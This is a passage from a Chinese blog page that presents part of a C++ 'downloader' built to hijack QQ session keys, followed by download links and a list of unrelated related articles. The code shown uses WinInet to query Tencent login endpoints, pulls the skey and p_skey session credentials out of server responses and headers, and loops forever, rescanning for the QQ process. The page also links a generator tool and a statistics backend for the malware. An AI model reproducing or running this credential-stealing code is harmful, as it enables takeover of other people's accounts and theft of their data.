1]();InternetReadFile(hHttpRequest, lpBufferx, dwNumberOfBytesAvailablex, &dwNumberOfBytesAvailablex);// 输出 Response 数据cout << "[+] Response Data:" << lpBufferx << "\r\n" << endl;// 从返回数据中提取 ptsigx 备用char* ptsigx = lpBufferx + dwNumberOfBytesAvailablex;while (ptsigx != lpBufferx){if (strstr(ptsigx, "check_sig?")){ptsigx += sizeof("check_sig");char* pEndBuffer = strstr(ptsigx, "'");*pEndBuffer = 0;break;}ptsigx--;}// 构造 ptsigx URLCString szPtsigx = "";szPtsigx.Format(TEXT("/check_sig?%s"), ptsigx);cout << "[+] szPtsigx:" << szPtsigx << "\r\n" << endl;delete[] lpBufferx;// 读取整个HeadersZeroMemory(lpHeaderBuffer, 1024);dwSizeOfRq = 1024;HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);// 提取 skey 的值char* skey = lpHeaderBuffer + dwSizeOfRq;while (skey != lpHeaderBuffer){if (strstr(skey, "skey=")){skey += sizeof("skey");char* pEndBuffer = strstr(skey, ";");*pEndBuffer = 0;break;}skey--;}// 关闭句柄InternetCloseHandle(hHttpRequest);InternetCloseHandle(hHttpSession);cout << "[+] Skey:" << skey << "\r\n" << endl;/* 五次会话 */char *u_Ptsigx = szPtsigx.GetBuffer(szPtsigx.GetLength() + 1);szPtsigx.ReleaseBuffer();// 发送HTTPS请求hHttpSession = InternetConnectA(hInternet, "ssl.ptlogin2.weiyun.com", INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);if (NULL != hHttpSession){hHttpRequest = HttpOpenRequestA(hHttpSession, "GET", u_Ptsigx, NULL, "", NULL, INTERNET_FLAG_SECURE, 0);if (NULL != hHttpRequest){bRet = HttpSendRequestA(hHttpRequest, NULL, NULL, NULL, 0);if (bRet){// 查询HTTP请求状态dwRetCode = 0;dwSizeOfRq = sizeof(DWORD);bRet = HttpQueryInfoA(hHttpRequest, HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER, &dwRetCode, &dwSizeOfRq, NULL);if (bRet){// 读取整个HeadersZeroMemory(lpHeaderBuffer, 1024);dwSizeOfRq = 1024;HttpQueryInfoA(hHttpRequest, HTTP_QUERY_RAW_HEADERS_CRLF, lpHeaderBuffer, &dwSizeOfRq, NULL);// 提取 p_skey 的值char* pskey = lpHeaderBuffer + dwSizeOfRq;while (pskey != lpHeaderBuffer){if (strstr(pskey, "p_skey=")){pskey += sizeof("p_skey");char* pEndBuffer = strstr(pskey, ";");*pEndBuffer = 0;break;}pskey--;}cout << "[+] P_skey:" << pskey << "\r\n" << endl;// 延时 20 分钟// 重新获取一遍// 每个Clientkey// 时效为 20 分钟Sleep(1200000);}}}}}}}}}}}}}}}}}}}}}InternetCloseHandle(hHttpRequest);}InternetCloseHandle(hHttpSession);}InternetCloseHandle(hInternet);}}// 延时两分钟// 继续搜索QQ进程Sleep(120000);} while (1);return 0;
}

生成器下载

Rainbow Downloader 2023 Free v1.2 生成器下载【CSDN】

Rainbow Downloader 2023 Free v1.2icon-default.png?t=N7T8https://download.csdn.net/download/qq_39190622/88374503

 Rainbow Downloader 2023 Free v1.2 生成器下载【蓝奏云】

Rainbow Downloader 2023 Free v1.2icon-default.png?t=N7T8https://wwrd.lanzoum.com/id0Bi19w53sj

  Rainbow Downloader 2023 Free v1.2 生成器下载【百度云 提取码:aw77】
​​​​​​​
Rainbow Downloader 2023 Free v1.2icon-default.png?t=N7T8https://pan.baidu.com/s/1Is3Eb0Ayk1dJn8zBIyGyyw

统计后台下载 

Rainbow Counting System 2023 Free v1.1 统计系统下载【CSDN】 

Rainbow Counting System 2023 Free v1.1icon-default.png?t=N7T8https://download.csdn.net/download/qq_39190622/88374513

 Rainbow Counting System 2023 Free v1.1 统计系统下载【蓝奏云】 

Rainbow Counting System 2023 Free v1.1icon-default.png?t=N7T8https://wwrd.lanzoum.com/iwG4M19w45ob

Rainbow Counting System 2023 Free v1.1 统计系统下载【百度云 提取码:i1fd】  ​​​​​​​
Rainbow Counting System 2023 Free v1.1icon-default.png?t=N7T8https://pan.baidu.com/s/1-VZs1-PV8ElCcBSSmqz7zA

这篇关于打造一款智能下载者 Downloader(劫持QQ Key篇)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/776789

相关文章

嵌入式QT开发:构建高效智能的嵌入式系统

嵌入式QT开发:构建高效智能的嵌入式系统

摘要: 本文深入探讨了嵌入式 QT 相关的各个方面。从 QT 框架的基础架构和核心概念出发,详细阐述了其在嵌入式环境中的优势与特点。文中分析了嵌入式 QT 的开发环境搭建过程,包括交叉编译工具链的配置等关键步骤。进一步探讨了嵌入式 QT 的界面设计与开发,涵盖了从基本控件的使用到复杂界面布局的构建。同时也深入研究了信号与槽机制在嵌入式系统中的应用,以及嵌入式 QT 与硬件设备的交互,包括输入输出设
阅读更多...
让树莓派智能语音助手实现定时提醒功能

让树莓派智能语音助手实现定时提醒功能

最初的时候是想直接在rasa 的chatbot上实现,因为rasa本身是带有remindschedule模块的。不过经过一番折腾后,忽然发现,chatbot上实现的定时,语音助手不一定会有响应。因为,我目前语音助手的代码设置了长时间无应答会结束对话,这样一来,chatbot定时提醒的触发就不会被语音助手获悉。那怎么让语音助手也具有定时提醒功能呢? 我最后选择的方法是用threading.Time
阅读更多...
智能交通(二)——Spinger特刊推荐

智能交通(二)——Spinger特刊推荐

特刊征稿 01  期刊名称: Autonomous Intelligent Systems  特刊名称: Understanding the Policy Shift  with the Digital Twins in Smart  Transportation and Mobility 截止时间: 开放提交:2024年1月20日 提交截止日
阅读更多...
基于 YOLOv5 的积水检测系统:打造高效智能的智慧城市应用

基于 YOLOv5 的积水检测系统:打造高效智能的智慧城市应用

在城市发展中,积水问题日益严重,特别是在大雨过后,积水往往会影响交通甚至威胁人们的安全。通过现代计算机视觉技术,我们能够智能化地检测和识别积水区域,减少潜在危险。本文将介绍如何使用 YOLOv5 和 PyQt5 搭建一个积水检测系统,结合深度学习和直观的图形界面,为用户提供高效的解决方案。 源码地址: PyQt5+YoloV5 实现积水检测系统 预览: 项目背景
阅读更多...
pip-tools:打造可重复、可控的 Python 开发环境,解决依赖关系,让代码更稳定

pip-tools:打造可重复、可控的 Python 开发环境,解决依赖关系,让代码更稳定

在 Python 开发中,管理依赖关系是一项繁琐且容易出错的任务。手动更新依赖版本、处理冲突、确保一致性等等,都可能让开发者感到头疼。而 pip-tools 为开发者提供了一套稳定可靠的解决方案。 什么是 pip-tools? pip-tools 是一组命令行工具,旨在简化 Python 依赖关系的管理,确保项目环境的稳定性和可重复性。它主要包含两个核心工具:pip-compile 和 pip
阅读更多...
【C++学习笔记 20】C++中的智能指针

【C++学习笔记 20】C++中的智能指针

智能指针的功能 在上一篇笔记提到了在栈和堆上创建变量的区别,使用new关键字创建变量时,需要搭配delete关键字销毁变量。而智能指针的作用就是调用new分配内存时,不必自己去调用delete,甚至不用调用new。 智能指针实际上就是对原始指针的包装。 unique_ptr 最简单的智能指针,是一种作用域指针,意思是当指针超出该作用域时,会自动调用delete。它名为unique的原因是这个
阅读更多...
git ssh key相关

git ssh key相关

step1、进入.ssh文件夹   (windows下 下载git客户端)   cd ~/.ssh(windows mkdir ~/.ssh) step2、配置name和email git config --global user.name "你的名称"git config --global user.email "你的邮箱" step3、生成key ssh-keygen
阅读更多...
单片机毕业设计基于单片机的智能门禁系统的设计与实现

单片机毕业设计基于单片机的智能门禁系统的设计与实现

文章目录 前言资料获取设计介绍功能介绍程序代码部分参考 设计清单具体实现截图参考文献设计获取 前言 💗博主介绍:✌全网粉丝10W+,CSDN特邀作者、博客专家、CSDN新星计划导师,一名热衷于单片机技术探索与分享的博主、专注于 精通51/STM32/MSP430/AVR等单片机设计 主要对象是咱们电子相关专业的大学生,希望您们都共创辉煌!✌💗 👇🏻 精彩专栏 推荐订
阅读更多...
DBeaver 连接 MySQL 报错 Public Key Retrieval is not allowed

DBeaver 连接 MySQL 报错 Public Key Retrieval is not allowed

DBeaver 连接 MySQL 报错 Public Key Retrieval is not allowed 文章目录 DBeaver 连接 MySQL 报错 Public Key Retrieval is not allowed问题解决办法 问题 使用 DBeaver 连接 MySQL 数据库的时候, 一直报错下面的错误 Public Key Retrieval is
阅读更多...
【C++】作用域指针、智能指针、共享指针、弱指针

【C++】作用域指针、智能指针、共享指针、弱指针

十、智能指针、共享指针 从上篇文章 【C++】如何用C++创建对象,理解作用域、堆栈、内存分配-CSDN博客 中我们知道,你的对象是创建在栈上还是在堆上,最大的区别就是对象的作用域不一样。所以在C++中,一旦程序进入另外一个作用域,那其他作用域的对象就自动销毁了。这种机制有好有坏。我们可以利用这个机制,比如可以自动化我们的代码,像智能指针、作用域锁(scoped_lock)等都是利用了这种机制。
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2